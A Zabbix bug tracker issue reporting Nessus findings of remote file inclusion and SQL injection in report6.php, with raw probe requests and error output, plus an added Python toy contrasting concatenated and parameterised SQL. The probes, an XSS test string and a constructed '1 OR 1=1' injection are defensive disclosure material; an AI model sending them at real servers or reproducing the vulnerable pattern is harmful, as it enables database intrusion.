ZABBIX BUGS AND ISSUES
ZBX-6652

CGI Generic Remote File Inclusion & CGI Generic SQL Injection vulnerabilities


    Details

    • Type: Incident report
    • Status: Closed
    • Priority: Major
    • Resolution: Fixed
    • Affects Version/s: 2.0.6
    • Fix Version/s: 2.0.7rc1, 2.1.2
    • Component/s: Frontend (F)
    • Environment: CentOS 6.4 x86_64, Apache, MySQL

      Description

      My ISO scanned my public-facing Zabbix server with Nessus and found the following security holes:

      39469 (1) - CGI Generic Remote File Inclusion
      Synopsis
      Arbitrary code may be run on the remote server.
      Description
      The remote web server hosts CGI scripts that fail to adequately sanitize request strings. By leveraging this issue, an attacker may be able to include a remote file from a remote server and execute arbitrary commands on the target host.
      See Also
      http://en.wikipedia.org/wiki/Remote_File_Inclusion
      http://projects.webappsec.org/Remote-File-Inclusion
      Solution
      Restrict access to the vulnerable application. Contact the vendor for a patch or upgrade.
      Risk Factor
      High
      CVSS Base Score
      7.5 (CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P)
      References
      XREF CWE:98
      XREF CWE:78
      XREF CWE:434
      XREF CWE:632
      XREF CWE:73
      XREF CWE:473
      XREF CWE:801
      XREF CWE:714
      XREF CWE:727
      Plugin Information:
      Publication date: 2009/06/19, Modification date: 2013/01/25
      Hosts
      zabbix.myschool.edu (tcp/443)

      Using the GET HTTP method, Nessus found that :

      + The following resources may be vulnerable to web code injection :

      + The 'items[0][itemid]' parameter of the /report6.php CGI :

      /report6.php?items[0][itemid]=http://p_lFYrwr.example.com/

      -------- output --------
      MMenu.def_label = 'reports'
      // ]]></script><div class="textwhite" id="mmenu"><table class="max [...]
      [...] include/db.inc.php:573]</li><li class="error">No item with itemid="http://p_lFYrwr.example.com/&quot;.</li><li class="error">Undefined index: color [includ [...]
      var page_refresh = null;
      jQuery(function() {
      ------------------------

      + The 'items[0][itemid]' parameter of the /zabbix/report6.php CGI :

      /zabbix/report6.php?items[0][itemid]=http://p_lFYrwr.example.com/

      -------- output --------
      MMenu.def_label = 'reports'
      // ]]></script><div class="textwhite" id="mmenu"><table class="max [...]
      [...] include/db.inc.php:573]</li><li class="error">No item with itemid="http://p_lFYrwr.example.com/&quot;.</li><li class="error">Undefined index: color [includ [...]
      var page_refresh = null;
      jQuery(function() {
      ------------------------

      42479 (1) - CGI Generic SQL Injection (2nd pass)
      Synopsis
      A web application is potentially vulnerable to SQL injection.
      Description
      By providing specially crafted parameters to CGIs, Nessus was able to get an error from the underlying database. This error suggests that the CGI is affected by a SQL injection vulnerability.

      An attacker may exploit this flaw to bypass authentication, read confidential data, modify the remote database, or even take control of the remote operating system.
      See Also
      http://en.wikipedia.org/wiki/SQL_injection
      http://www.securiteam.com/securityreviews/5DP0N1P76E.html
      http://www.nessus.org/u?e5c79f44
      http://www.nessus.org/u?11ab1866
      Solution
      Modify the relevant CGIs so that they properly escape arguments.
      Risk Factor
      High
      CVSS Base Score
      7.5 (CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P)
      References
      XREF CWE:89
      XREF CWE:20
      XREF CWE:77
      XREF CWE:810
      XREF CWE:713
      XREF CWE:722
      XREF CWE:727
      XREF CWE:751
      XREF CWE:801
      Plugin Information:
      Publication date: 2009/11/12, Modification date: 2013/03/29
      Hosts
      zabbix.myschool.edu (tcp/443)

      During testing for web code injection vulnerabilities,
      SQL errors were noticed, suggesting that the scripts / parameters
      listed below may also be vulnerable to SQL Injection (SQLi).

      -------- request --------
      GET /report6.php?items[0][itemid]=http://p_lFYrwr.example.com/ HTTP/1.1
      Host: zabbix.myschool.edu
      Accept-Charset: iso-8859-1,utf-8;q=0.9,*;q=0.1
      Accept-Language: en
      Connection: Close
      Cookie: zbx_sessionid=d0d318bc93ce17cd3e18822abf1e6538
      User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)
      Pragma: no-cache
      Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, */*
      ------------------------

      -------- output --------
      MMenu.def_label = 'reports'
      // ]]></script><div class="textwhite" id="mmenu"><table class="max [...]
      [...] wr.example.com/] [You have an error in your SQL syntax; check the manual [...]
      var page_refresh = null;
      jQuery(function() {
      ------------------------

      -------- request --------
      GET /zabbix/report6.php?items[0][description]=http://rfi.nessus.org/rfi.txt HTTP/1.1
      Host: zabbix.myschool.edu
      Accept-Charset: iso-8859-1,utf-8;q=0.9,*;q=0.1
      Accept-Language: en
      Connection: Close
      User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)
      Pragma: no-cache
      Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, */*
      ------------------------

      -------- output --------
      MMenu.def_label = 'reports'
      // ]]></script><div class="textwhite" id="mmenu"><table class="max [...]
      [...] WHERE i.itemid=] [You have an error in your SQL syntax; check the manual [...]
      var page_refresh = null;
      jQuery(function() {
      ------------------------

      -------- request --------
      GET /zabbix/report6.php?items[0][itemid]=http://p_lFYrwr.example.com/ HTTP/1.1
      Host: zabbix.myschool.edu
      Accept-Charset: iso-8859-1,utf-8;q=0.9,*;q=0.1
      Accept-Language: en
      Connection: Close
      Cookie: zbx_sessionid=59cb8edba53dbf30c6ec0e378fbd6607
      User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)
      Pragma: no-cache
      Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, */*
      ------------------------

      -------- output --------
      MMenu.def_label = 'reports'
      // ]]></script><div class="textwhite" id="mmenu"><table class="max [...]
      [...] wr.example.com/] [You have an error in your SQL syntax; check the manual [...]
      var page_refresh = null;
      jQuery(function() {
      ------------------------

      During testing for persistent XSS vulnerabilities,
      SQL errors were noticed, suggesting that the scripts / parameters
      listed below may also be vulnerable to SQL Injection (SQLi).

      -------- request --------
      GET /report6.php?items[0][itemid]=<script>alert([...]);</script>&groupid=0&btn1=Select&palette=2&remove=%20%26raquo%3b%20&groupids_right=&report_show=Show&report_timetill=20130530040359&report_timesince=20130529040359&report_till_hour=04&report_till_month=05&report_since_day=29&report_since_month=05&reset=Reset&ylabel=&showlegend=1&form_refresh=1&config=2&print=1&sid=62713028951426aa&ddreset=1&report_till_year=2013&scaletype=2&report_since_year=2013&form=1&add_item=Add&report_till_day=30&report_till_minute=03&report_since_minute=03&report_since_hour=04&xlabel=&title=Report%202&items[0][description]=&palettetype=2&groupids_left=&add=&sortorder=0&hostids_left=&avgperiod=2&hostids_right=&add_period=Add&sorttype=0 HTTP/1.1
      Host: zabbix.myschool.edu
      Accept-Charset: iso-8859-1,utf-8;q=0.9,*;q=0.1
      Accept-Language: en
      Connection: Close
      User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)
      Pragma: no-cache
      Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, */*
      ------------------------

      -------- output --------
      <body class="originalblue">
      <div id="message-global-wrap"><div id="message-global"></div></div>
      [...] </script>] [You have an error in your SQL syntax; check the manual [...]
      var page_refresh = null;
      jQuery(function() {
      ------------------------
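What the scan output above evidences, as an added illustration that is not part of the report and not Zabbix's code: the RFI plugin (39469) and the SQLi plugin (42479) both fire on the same probe value, `http://p_lFYrwr.example.com/`, sent in `items[0][itemid]`. The first response shows that value echoed inside a "No item with itemid=..." error; the later responses show a MySQL "error in your SQL syntax" right after a `WHERE i.itemid=` fragment, which is consistent with the parameter reaching the query unquoted and unvalidated. The toy below, in Python against an in-memory SQLite table (a constructed stand-in; the Zabbix frontend is PHP on MySQL), puts that concatenation pattern next to an integer-validated, parameterised lookup and runs the scanner's probe plus a constructed tautology through both. The table contents, `fetch_item_vulnerable`, `fetch_item_hardened` and `probe` are all hypothetical and say nothing about how the project actually fixed ZBX-6652.

```python
import re
import sqlite3

# Constructed in-memory stand-in for an items table.  This illustrates the
# bug class the scan output points at; it is not Zabbix's schema or code.
SCHEMA = """
CREATE TABLE items (itemid INTEGER PRIMARY KEY, name TEXT, key_ TEXT);
INSERT INTO items VALUES (1, 'CPU load',    'system.cpu.load');
INSERT INTO items VALUES (2, 'Free memory', 'vm.memory.size[available]');
INSERT INTO items VALUES (3, 'Agent ping',  'agent.ping');
"""

def connect():
    conn = sqlite3.connect(":memory:")
    conn.executescript(SCHEMA)
    return conn

def fetch_item_vulnerable(conn, itemid):
    # Hypothetical vulnerable pattern: the request parameter is concatenated
    # into the statement unquoted and unvalidated, so everything after
    # 'WHERE i.itemid=' is whatever the client sent.
    sql = "SELECT i.itemid, i.name FROM items i WHERE i.itemid=" + itemid
    return conn.execute(sql).fetchall()

def fetch_item_hardened(conn, itemid):
    # Hardened form: an itemid is an unsigned integer, so refuse anything
    # else up front, then bind the value so the database never parses it.
    if not re.fullmatch(r"[0-9]+", itemid):
        raise ValueError("itemid must be an unsigned integer")
    sql = "SELECT i.itemid, i.name FROM items i WHERE i.itemid=?"
    return conn.execute(sql, (int(itemid),)).fetchall()

def probe(fn, itemid):
    """Call fn on a fresh table; return ('ok', rows) or ('error', message).

    Mirrors what the scanner sees: either a normal page, or a database
    error leaking into the response, which is the signal plugin 42479 keys on.
    """
    try:
        return ("ok", fn(connect(), itemid))
    except (sqlite3.Error, ValueError) as exc:
        return ("error", "%s: %s" % (type(exc).__name__, exc))

if __name__ == "__main__":
    # A legitimate id, the scanner's URL probe from the report above, and a
    # constructed tautology showing that an error page is not the only outcome.
    for value in ("2", "http://p_lFYrwr.example.com/", "1 OR 1=1"):
        for fn in (fetch_item_vulnerable, fetch_item_hardened):
            print("%-24s %-32r -> %r" % (fn.__name__, value, probe(fn, value)))
```

The URL probe is what makes the vulnerable variant emit a database syntax error, exactly the symptom in the responses above; the tautology shows the same concatenation returning every row with no error at all, which is why a generic scanner's "SQL error noticed" finding is a floor, not a ceiling, on what the parameter allows. The hardened variant rejects both before any SQL is built. On the Nessus side, the RFI hit (39469) is a heuristic triggered by the value being a URL; nothing in the captured output shows the URL being fetched or included, whereas the SQL error beside `WHERE i.itemid=` is direct evidence for the injection finding (42479) and is the one to triage first.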

        People

        Assignee: Unassigned
        Reporter: genebean (Gene Liverman)